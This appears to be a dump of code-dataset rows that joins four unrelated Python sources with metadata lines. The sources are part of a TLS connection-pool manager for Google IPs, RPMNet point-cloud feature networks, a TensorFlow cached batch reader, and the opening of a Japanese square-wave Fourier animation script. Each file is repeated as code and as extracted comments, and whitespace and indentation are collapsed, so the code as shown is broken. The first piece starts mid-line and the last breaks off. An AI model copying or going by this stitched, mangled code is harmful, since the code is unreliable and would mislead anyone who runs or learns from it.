request %s", host) request_data = 'HEAD /_gh/ HTTP/1.1\r\nHost: %s\r\n\r\n' % host response = None try: ssl_sock.settimeout(10) ssl_sock._sock.settimeout(10) data = request_data.encode() ret = ssl_sock.send(data) if ret != len(data): xlog.warn("head send len:%d %d", ret, len(data)) response = httplib.HTTPResponse(ssl_sock, buffering=True) response.begin() status = response.status if status != 200: xlog.debug("app head fail status:%d", status) raise Exception("app check fail %r" % status) return True except httplib.BadStatusLine as e: inactive_time = time.time() - ssl_sock.last_use_time xlog.debug("%s keep alive fail, time:%d", ssl_sock.ip, inactive_time) return False except Exception as e: xlog.warn("%s head %s request fail:%r", ssl_sock.ip, ssl_sock.appid, e) return False finally: if response: response.close() def keep_alive_worker(self, sock): call_time = time.time() if self.head_request(sock): self.save_ssl_connection_for_reuse(sock, call_time=call_time) else: google_ip.report_connect_closed(sock.ip, "HEAD") sock.close() #self.create_more_connection() def start_keep_alive(self, sock): work_thread = threading.Thread(target=self.keep_alive_worker, args=(sock,)) work_thread.start() def keep_alive_thread(self): while self.keep_alive and connect_control.keep_running: if not connect_control.is_active(): time.sleep(1) continue new_list = self.new_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) old_list = self.gae_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) to_keep_live_list = new_list + old_list for ssl_sock in to_keep_live_list: inactive_time = time.time() - ssl_sock.last_use_time if inactive_time > self.keep_alive: google_ip.report_connect_closed(ssl_sock.ip, "alive_timeout") ssl_sock.close() else: self.start_keep_alive(ssl_sock) for host in self.host_conn_pool: host_list = self.host_conn_pool[host].get_need_keep_alive(maxtime=self.keep_alive-3) for ssl_sock in host_list: google_ip.report_connect_closed(ssl_sock.ip, "host pool alive_timeout") ssl_sock.close() #self.create_more_connection() time.sleep(1) def save_ssl_connection_for_reuse(self, ssl_sock, host=None, call_time=0): if call_time: ssl_sock.last_use_time = call_time else: ssl_sock.last_use_time = time.time() if host: if host not in self.host_conn_pool: self.host_conn_pool[host] = Connect_pool() self.host_conn_pool[host].put( (ssl_sock.handshake_time, ssl_sock) ) else: self.gae_conn_pool.put( (ssl_sock.handshake_time, ssl_sock) ) while self.gae_conn_pool.qsize() > self.connection_pool_max_num: handshake_time, ssl_sock = self.gae_conn_pool.get_slowest() google_ip.report_connect_closed(ssl_sock.ip, "slowest %d" % ssl_sock.handshake_time) ssl_sock.close() def create_more_connection_worker(self): need_conn_num = self.connection_pool_min_num - self.new_conn_pool.qsize() target_thread_num = min(self.max_thread_num, need_conn_num) while self.thread_num < target_thread_num and self.new_conn_pool.qsize() < self.connection_pool_min_num: if not connect_control.allow_connect(): break self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_thread) p.start() time.sleep(0.3) def create_more_connection(self): p = threading.Thread(target=self.create_more_connection_worker) p.start() def create_connection_daemon(self): connect_start_num = 0 while connect_control.keep_running: time.sleep(0.1) if not connect_control.allow_connect(): time.sleep(5) continue if self.thread_num > self.max_thread_num: continue target_conn_num = (1 - (connect_control.inactive_time()/(10*60))) * self.connection_pool_min_num if self.new_conn_pool.qsize() > target_conn_num: time.sleep(1) continue self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_process) p.start() connect_start_num += 1 if connect_start_num > 10: time.sleep(5) connect_start_num = 0 def connect_process(self): try: ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") return port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def connect_thread(self, sleep_time=0): time.sleep(sleep_time) try: while self.new_conn_pool.qsize() < self.connection_pool_min_num: if self.new_conn_pool.qsize() >= self.connection_pool_min_num: #xlog.debug("get enough conn") break ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") break port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) elif not connect_control.allow_connect(): break time.sleep(1) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def _create_ssl_connection(self, ip_port): if not connect_control.allow_connect(): time.sleep(10) return False sock = None ssl_sock = None ip = ip_port[0] connect_control.start_connect_register(high_prior=True) connect_time = 0 handshake_time = 0 time_begin = time.time() try: if config.PROXY_ENABLE: sock = socks.socksocket(socket.AF_INET if ':' not in ip else socket.AF_INET6) else: sock = socket.socket(socket.AF_INET if ':' not in ip else socket.AF_INET6) # set reuseaddr option to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) # resize socket recv buffer 8K->32K to improve browser releated application performance sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32*1024) # disable negal algorithm to send http request quickly. sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, True) # set a short timeout to trigger timeout retry more quickly. sock.settimeout(self.timeout) ssl_sock = SSLConnection(self.openssl_context, sock, ip, google_ip.ssl_closed) ssl_sock.set_connect_state() ssl_sock.connect(ip_port) time_connected = time.time() ssl_sock.do_handshake() time_handshaked = time.time() connect_time = int((time_connected - time_begin) * 1000) handshake_time = int((time_handshaked - time_connected) * 1000) google_ip.update_ip(ip, handshake_time) xlog.debug("create_ssl update ip:%s time:%d", ip, handshake_time) ssl_sock.fd = sock.fileno() ssl_sock.create_time = time_begin ssl_sock.received_size = 0 ssl_sock.load = 0 ssl_sock.handshake_time = handshake_time ssl_sock.host = '' def verify_SSL_certificate_issuer(ssl_sock): cert = ssl_sock.get_peer_certificate() if not cert: #google_ip.report_bad_ip(ssl_sock.ip) #connect_control.fall_into_honeypot() raise socket.error(' certficate is none') issuer_commonname = next((v for k, v in cert.get_issuer().get_components() if k == 'CN'), '') if not issuer_commonname.startswith('Google'): google_ip.report_connect_fail(ip, force_remove=True) raise socket.error(' certficate is issued by %r, not Google' % ( issuer_commonname)) verify_SSL_certificate_issuer(ssl_sock) connect_control.report_connect_success() return ssl_sock except Exception as e: time_cost = time.time() - time_begin if time_cost < self.timeout - 1: xlog.debug("connect %s fail:%s cost:%d h:%d", ip, e, time_cost * 1000, handshake_time) else: xlog.debug("%s fail:%r", ip, e) google_ip.report_connect_fail(ip) connect_control.report_connect_fail() if ssl_sock: ssl_sock.close() if sock: sock.close() return False finally: connect_control.end_connect_register(high_prior=True) def get_ssl_connection(self, host=''): ssl_sock = None if host: if host in self.host_conn_pool: while True: ret = self.host_conn_pool[host].get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("host_conn_pool %s get:%s handshake:%d", host, ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue else: while True: ret = self.gae_conn_pool.get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("ssl_pool.get:%s handshake:%d", ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue self.create_more_connection() if ssl_sock: return ssl_sock else: ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("create ssl timeout fail.") return None def get_new_ssl(self): self.create_more_connection() ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("get_new_ssl timeout fail.") return None https_manager = Https_connection_manager()
en
0.44673
#!/usr/bin/env python # coding:utf-8 #if not google_ip.is_traffic_quota_allow(ip): # continue #logging.debug("inactive_time:%d", inactive_time * 1000) # http://docs.python.org/dev/library/ssl.html # http://blog.ivanristic.com/2009/07/examples-of-the-information-collected-from-ssl-handshakes.html # http://src.chromium.org/svn/trunk/src/net/third_party/nss/ssl/sslenum.c # openssl s_server -accept 443 -key CA.crt -cert CA.crt # ref: http://vincent.bernat.im/en/blog/2011-ssl-session-reuse-rfc5077.html # public appid don't keep alive, for quota limit. #logging.info("public appid don't keep alive") #self.keep_alive = 0 #logging.debug("head request %s", host) #self.create_more_connection() #self.create_more_connection() #logging.debug("create ssl conn %s", ip_str) #xlog.debug("get enough conn") #logging.debug("create ssl conn %s", ip_str) # set reuseaddr option to avoid 10048 socket error # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error # resize socket recv buffer 8K->32K to improve browser releated application performance # disable negal algorithm to send http request quickly. # set a short timeout to trigger timeout retry more quickly. #google_ip.report_bad_ip(ssl_sock.ip) #connect_control.fall_into_honeypot()
2.205275
2
src/models/feature_nets.py
yewzijian/RPMNet
223
6628986
"""Feature Extraction and Parameter Prediction networks """ import logging import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from models.pointnet_util import sample_and_group_multi _raw_features_sizes = {'xyz': 3, 'dxyz': 3, 'ppf': 4} _raw_features_order = {'xyz': 0, 'dxyz': 1, 'ppf': 2} class ParameterPredictionNet(nn.Module): def __init__(self, weights_dim): """PointNet based Parameter prediction network Args: weights_dim: Number of weights to predict (excluding beta), should be something like [3], or [64, 3], for 3 types of features """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.weights_dim = weights_dim # Pointnet self.prepool = nn.Sequential( nn.Conv1d(4, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 128, 1), nn.GroupNorm(8, 128), nn.ReLU(), nn.Conv1d(128, 1024, 1), nn.GroupNorm(16, 1024), nn.ReLU(), ) self.pooling = nn.AdaptiveMaxPool1d(1) self.postpool = nn.Sequential( nn.Linear(1024, 512), nn.GroupNorm(16, 512), nn.ReLU(), nn.Linear(512, 256), nn.GroupNorm(16, 256), nn.ReLU(), nn.Linear(256, 2 + np.prod(weights_dim)), ) self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """ Returns alpha, beta, and gating_weights (if needed) Args: x: List containing two point clouds, x[0] = src (B, J, 3), x[1] = ref (B, K, 3) Returns: beta, alpha, weightings """ src_padded = F.pad(x[0], (0, 1), mode='constant', value=0) ref_padded = F.pad(x[1], (0, 1), mode='constant', value=1) concatenated = torch.cat([src_padded, ref_padded], dim=1) prepool_feat = self.prepool(concatenated.permute(0, 2, 1)) pooled = torch.flatten(self.pooling(prepool_feat), start_dim=-2) raw_weights = self.postpool(pooled) beta = F.softplus(raw_weights[:, 0]) alpha = F.softplus(raw_weights[:, 1]) return beta, alpha class ParameterPredictionNetConstant(nn.Module): def __init__(self, weights_dim): """Parameter Prediction Network with single alpha/beta as parameter. See: Ablation study (Table 4) in paper """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.anneal_weights = nn.Parameter(torch.zeros(2 + np.prod(weights_dim))) self.weights_dim = weights_dim self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """Returns beta, gating_weights""" batch_size = x[0].shape[0] raw_weights = self.anneal_weights beta = F.softplus(raw_weights[0].expand(batch_size)) alpha = F.softplus(raw_weights[1].expand(batch_size)) return beta, alpha def get_prepool(in_dim, out_dim): """Shared FC part in PointNet before max pooling""" net = nn.Sequential( nn.Conv2d(in_dim, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), ) return net def get_postpool(in_dim, out_dim): """Linear layers in PointNet after max pooling Args: in_dim: Number of input channels out_dim: Number of output channels. Typically smaller than in_dim """ net = nn.Sequential( nn.Conv1d(in_dim, in_dim, 1), nn.GroupNorm(8, in_dim), nn.ReLU(), nn.Conv1d(in_dim, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), nn.Conv1d(out_dim, out_dim, 1), ) return net class FeatExtractionEarlyFusion(nn.Module): """Feature extraction Module that extracts hybrid features""" def __init__(self, features, feature_dim, radius, num_neighbors): super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self._logger.info('Using early fusion, feature dim = {}'.format(feature_dim)) self.radius = radius self.n_sample = num_neighbors self.features = sorted(features, key=lambda f: _raw_features_order[f]) self._logger.info('Feature extraction using features {}'.format(', '.join(self.features))) # Layers raw_dim = np.sum([_raw_features_sizes[f] for f in self.features]) # number of channels after concat self.prepool = get_prepool(raw_dim, feature_dim * 2) self.postpool = get_postpool(feature_dim * 2, feature_dim) def forward(self, xyz, normals): """Forward pass of the feature extraction network Args: xyz: (B, N, 3) normals: (B, N, 3) Returns: cluster features (B, N, C) """ features = sample_and_group_multi(-1, self.radius, self.n_sample, xyz, normals) features['xyz'] = features['xyz'][:, :, None, :] # Gate and concat concat = [] for i in range(len(self.features)): f = self.features[i] expanded = (features[f]).expand(-1, -1, self.n_sample, -1) concat.append(expanded) fused_input_feat = torch.cat(concat, -1) # Prepool_FC, pool, postpool-FC new_feat = fused_input_feat.permute(0, 3, 2, 1) # [B, 10, n_sample, N] new_feat = self.prepool(new_feat) pooled_feat = torch.max(new_feat, 2)[0] # Max pooling (B, C, N) post_feat = self.postpool(pooled_feat) # Post pooling dense layers cluster_feat = post_feat.permute(0, 2, 1) cluster_feat = cluster_feat / torch.norm(cluster_feat, dim=-1, keepdim=True) return cluster_feat # (B, N, C)
"""Feature Extraction and Parameter Prediction networks """ import logging import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from models.pointnet_util import sample_and_group_multi _raw_features_sizes = {'xyz': 3, 'dxyz': 3, 'ppf': 4} _raw_features_order = {'xyz': 0, 'dxyz': 1, 'ppf': 2} class ParameterPredictionNet(nn.Module): def __init__(self, weights_dim): """PointNet based Parameter prediction network Args: weights_dim: Number of weights to predict (excluding beta), should be something like [3], or [64, 3], for 3 types of features """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.weights_dim = weights_dim # Pointnet self.prepool = nn.Sequential( nn.Conv1d(4, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 64, 1), nn.GroupNorm(8, 64), nn.ReLU(), nn.Conv1d(64, 128, 1), nn.GroupNorm(8, 128), nn.ReLU(), nn.Conv1d(128, 1024, 1), nn.GroupNorm(16, 1024), nn.ReLU(), ) self.pooling = nn.AdaptiveMaxPool1d(1) self.postpool = nn.Sequential( nn.Linear(1024, 512), nn.GroupNorm(16, 512), nn.ReLU(), nn.Linear(512, 256), nn.GroupNorm(16, 256), nn.ReLU(), nn.Linear(256, 2 + np.prod(weights_dim)), ) self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """ Returns alpha, beta, and gating_weights (if needed) Args: x: List containing two point clouds, x[0] = src (B, J, 3), x[1] = ref (B, K, 3) Returns: beta, alpha, weightings """ src_padded = F.pad(x[0], (0, 1), mode='constant', value=0) ref_padded = F.pad(x[1], (0, 1), mode='constant', value=1) concatenated = torch.cat([src_padded, ref_padded], dim=1) prepool_feat = self.prepool(concatenated.permute(0, 2, 1)) pooled = torch.flatten(self.pooling(prepool_feat), start_dim=-2) raw_weights = self.postpool(pooled) beta = F.softplus(raw_weights[:, 0]) alpha = F.softplus(raw_weights[:, 1]) return beta, alpha class ParameterPredictionNetConstant(nn.Module): def __init__(self, weights_dim): """Parameter Prediction Network with single alpha/beta as parameter. See: Ablation study (Table 4) in paper """ super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self.anneal_weights = nn.Parameter(torch.zeros(2 + np.prod(weights_dim))) self.weights_dim = weights_dim self._logger.info('Predicting weights with dim {}.'.format(self.weights_dim)) def forward(self, x): """Returns beta, gating_weights""" batch_size = x[0].shape[0] raw_weights = self.anneal_weights beta = F.softplus(raw_weights[0].expand(batch_size)) alpha = F.softplus(raw_weights[1].expand(batch_size)) return beta, alpha def get_prepool(in_dim, out_dim): """Shared FC part in PointNet before max pooling""" net = nn.Sequential( nn.Conv2d(in_dim, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim // 2, 1), nn.GroupNorm(8, out_dim // 2), nn.ReLU(), nn.Conv2d(out_dim // 2, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), ) return net def get_postpool(in_dim, out_dim): """Linear layers in PointNet after max pooling Args: in_dim: Number of input channels out_dim: Number of output channels. Typically smaller than in_dim """ net = nn.Sequential( nn.Conv1d(in_dim, in_dim, 1), nn.GroupNorm(8, in_dim), nn.ReLU(), nn.Conv1d(in_dim, out_dim, 1), nn.GroupNorm(8, out_dim), nn.ReLU(), nn.Conv1d(out_dim, out_dim, 1), ) return net class FeatExtractionEarlyFusion(nn.Module): """Feature extraction Module that extracts hybrid features""" def __init__(self, features, feature_dim, radius, num_neighbors): super().__init__() self._logger = logging.getLogger(self.__class__.__name__) self._logger.info('Using early fusion, feature dim = {}'.format(feature_dim)) self.radius = radius self.n_sample = num_neighbors self.features = sorted(features, key=lambda f: _raw_features_order[f]) self._logger.info('Feature extraction using features {}'.format(', '.join(self.features))) # Layers raw_dim = np.sum([_raw_features_sizes[f] for f in self.features]) # number of channels after concat self.prepool = get_prepool(raw_dim, feature_dim * 2) self.postpool = get_postpool(feature_dim * 2, feature_dim) def forward(self, xyz, normals): """Forward pass of the feature extraction network Args: xyz: (B, N, 3) normals: (B, N, 3) Returns: cluster features (B, N, C) """ features = sample_and_group_multi(-1, self.radius, self.n_sample, xyz, normals) features['xyz'] = features['xyz'][:, :, None, :] # Gate and concat concat = [] for i in range(len(self.features)): f = self.features[i] expanded = (features[f]).expand(-1, -1, self.n_sample, -1) concat.append(expanded) fused_input_feat = torch.cat(concat, -1) # Prepool_FC, pool, postpool-FC new_feat = fused_input_feat.permute(0, 3, 2, 1) # [B, 10, n_sample, N] new_feat = self.prepool(new_feat) pooled_feat = torch.max(new_feat, 2)[0] # Max pooling (B, C, N) post_feat = self.postpool(pooled_feat) # Post pooling dense layers cluster_feat = post_feat.permute(0, 2, 1) cluster_feat = cluster_feat / torch.norm(cluster_feat, dim=-1, keepdim=True) return cluster_feat # (B, N, C)
en
0.814857
Feature Extraction and Parameter Prediction networks PointNet based Parameter prediction network Args: weights_dim: Number of weights to predict (excluding beta), should be something like [3], or [64, 3], for 3 types of features # Pointnet Returns alpha, beta, and gating_weights (if needed) Args: x: List containing two point clouds, x[0] = src (B, J, 3), x[1] = ref (B, K, 3) Returns: beta, alpha, weightings Parameter Prediction Network with single alpha/beta as parameter. See: Ablation study (Table 4) in paper Returns beta, gating_weights Shared FC part in PointNet before max pooling Linear layers in PointNet after max pooling Args: in_dim: Number of input channels out_dim: Number of output channels. Typically smaller than in_dim Feature extraction Module that extracts hybrid features # Layers # number of channels after concat Forward pass of the feature extraction network Args: xyz: (B, N, 3) normals: (B, N, 3) Returns: cluster features (B, N, C) # Gate and concat # Prepool_FC, pool, postpool-FC # [B, 10, n_sample, N] # Max pooling (B, C, N) # Post pooling dense layers # (B, N, C)
2.58284
3
kfac/python/ops/kfac_utils/data_reader.py
ntselepidis/kfac
179
6628987
<gh_stars>100-1000 # Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Reads variable size batches of data from a data set and stores read data. `VariableBatchReader` reads variable size data from a dataset. `CachedDataReader` on top of `VariableBatchReader` adds functionality to store the read batch for use in the next session.run() call. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # Dependency imports import tensorflow.compat.v1 as tf def _slice_data(stored_data, size): return [data[:size] for data in stored_data] class VariableBatchReader(object): """Read data of varying batch sizes from a data set.""" def __init__(self, dataset, max_batch_size): """Initializes class. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ self._dataset = dataset self._max_batch_size = max_batch_size def __call__(self, batch_size): """Reads `batch_size` data. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ check_size = tf.assert_less_equal( batch_size, tf.convert_to_tensor(self._max_batch_size, dtype=tf.int32), message='Data set read failure, Batch size greater than max allowed.' ) with tf.control_dependencies([check_size]): return _slice_data(self._dataset, batch_size) class CachedDataReader(VariableBatchReader): """Provides functionality to store variable batch size data.""" def __init__(self, dataset, max_batch_size): """Initializes class and creates variables for storing previous batch. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ super(CachedDataReader, self).__init__(dataset, max_batch_size) with tf.variable_scope('cached_data_reader'): self._cached_batch_storage = [ tf.get_variable( name='{}{}'.format('cached_batch_storage_', i), shape=[max_batch_size]+ var.shape.as_list()[1:], dtype=var.dtype, trainable=False, use_resource=True) for i, var in enumerate(self._dataset) ] self._cached_batch_size = tf.get_variable( name='cached_batch_size', shape=(), dtype=tf.int32, trainable=False, use_resource=True) self._cached_batch = _slice_data(self._cached_batch_storage, self._cached_batch_size) def __call__(self, batch_size): """Reads `batch_size` data and stores the read batch. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ sliced_data = super(CachedDataReader, self).__call__(batch_size) # We need to make sure we read the cached batch before we update it! with tf.control_dependencies(self._cached_batch): batch_size_assign_op = self._cached_batch_size.assign(batch_size) data_assign_ops = [ prev[:batch_size].assign(cur) # yes, this actually works for prev, cur in zip(self._cached_batch_storage, sliced_data) ] with tf.control_dependencies(data_assign_ops + [batch_size_assign_op]): return [tf.identity(sdata) for sdata in sliced_data] @property def cached_batch(self): return self._cached_batch
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Reads variable size batches of data from a data set and stores read data. `VariableBatchReader` reads variable size data from a dataset. `CachedDataReader` on top of `VariableBatchReader` adds functionality to store the read batch for use in the next session.run() call. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # Dependency imports import tensorflow.compat.v1 as tf def _slice_data(stored_data, size): return [data[:size] for data in stored_data] class VariableBatchReader(object): """Read data of varying batch sizes from a data set.""" def __init__(self, dataset, max_batch_size): """Initializes class. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ self._dataset = dataset self._max_batch_size = max_batch_size def __call__(self, batch_size): """Reads `batch_size` data. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ check_size = tf.assert_less_equal( batch_size, tf.convert_to_tensor(self._max_batch_size, dtype=tf.int32), message='Data set read failure, Batch size greater than max allowed.' ) with tf.control_dependencies([check_size]): return _slice_data(self._dataset, batch_size) class CachedDataReader(VariableBatchReader): """Provides functionality to store variable batch size data.""" def __init__(self, dataset, max_batch_size): """Initializes class and creates variables for storing previous batch. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. """ super(CachedDataReader, self).__init__(dataset, max_batch_size) with tf.variable_scope('cached_data_reader'): self._cached_batch_storage = [ tf.get_variable( name='{}{}'.format('cached_batch_storage_', i), shape=[max_batch_size]+ var.shape.as_list()[1:], dtype=var.dtype, trainable=False, use_resource=True) for i, var in enumerate(self._dataset) ] self._cached_batch_size = tf.get_variable( name='cached_batch_size', shape=(), dtype=tf.int32, trainable=False, use_resource=True) self._cached_batch = _slice_data(self._cached_batch_storage, self._cached_batch_size) def __call__(self, batch_size): """Reads `batch_size` data and stores the read batch. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. """ sliced_data = super(CachedDataReader, self).__call__(batch_size) # We need to make sure we read the cached batch before we update it! with tf.control_dependencies(self._cached_batch): batch_size_assign_op = self._cached_batch_size.assign(batch_size) data_assign_ops = [ prev[:batch_size].assign(cur) # yes, this actually works for prev, cur in zip(self._cached_batch_storage, sliced_data) ] with tf.control_dependencies(data_assign_ops + [batch_size_assign_op]): return [tf.identity(sdata) for sdata in sliced_data] @property def cached_batch(self): return self._cached_batch
en
0.789527
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== Reads variable size batches of data from a data set and stores read data. `VariableBatchReader` reads variable size data from a dataset. `CachedDataReader` on top of `VariableBatchReader` adds functionality to store the read batch for use in the next session.run() call. # Dependency imports Read data of varying batch sizes from a data set. Initializes class. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. Reads `batch_size` data. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. Provides functionality to store variable batch size data. Initializes class and creates variables for storing previous batch. Args: dataset: List of Tensors representing the dataset, shuffled, repeated, and batched into mini-batches of size at least `max_batch_size`. In other words it should be reshuffled at each session.run call. This can be done with the tf.data package using the construction demonstrated in load_mnist() function in examples/autoencoder_auto_damping.py. max_batch_size: `int`. Maximum batch size of the data that can be retrieved from the data set. Reads `batch_size` data and stores the read batch. Args: batch_size: Tensor of type `int32`, batch size of the data to be retrieved from the dataset. `batch_size` should be less than or equal to `max_batch_size`. Returns: Read data, An iterable of tensors with batch size equal to `batch_size`. # We need to make sure we read the cached batch before we update it! # yes, this actually works
3.008675
3
DigitalSignalProcessing/dsp_rectangle_anime.py
tam17aki/speech_process_exercise
74
6628988
<filename>DigitalSignalProcessing/dsp_rectangle_anime.py<gh_stars>10-100 #!/usr/bin/env python """ 音声情報処理 n本ノック !! """ # MIT License # Copyright (C) 2020 by <NAME> # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Commentary: # - 矩形波をフーリエ級数近似により作成する # - 近似の様子をアニメーションにより可視化 import math import numpy import numpy.matlib import matplotlib.pyplot as plt import matplotlib.animation as animation # Period [s] PERIOD = 1 # Sampling frequency for plot 